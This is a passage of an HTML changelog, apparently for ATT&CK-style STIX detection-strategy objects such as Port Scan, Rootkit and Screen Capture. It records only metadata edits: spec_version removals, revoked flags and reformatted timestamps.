1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0915] Detection of Online Edit</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T00:43:15.974Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:43:15.974000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:30:40.347Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0788] Detection of Point & Tag Identification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0907] Detection of Port Scan</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T18:52:19.941Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 18:52:19.941000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:30:52.373Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0914] Detection of Program Append</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T00:32:34.211Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:32:34.211000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:31:02.396Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0752] Detection of Program Download</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0913] Detection of Program Download All</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T00:09:43.016Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:09:43.016000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:31:14.045Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0761] Detection of Program Upload</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0766] Detection of Project File Infection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0804] Detection of Remote Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0739] Detection of Remote System Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0787] Detection of Remote System Information Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0733] Detection of Replication Through Removable Media</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0792] Detection of Rogue Master</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0780] Detection of Rootkit</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0751] Detection of Screen Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0735] Detection of Scripting</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0765] Detection of Service Stop</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px 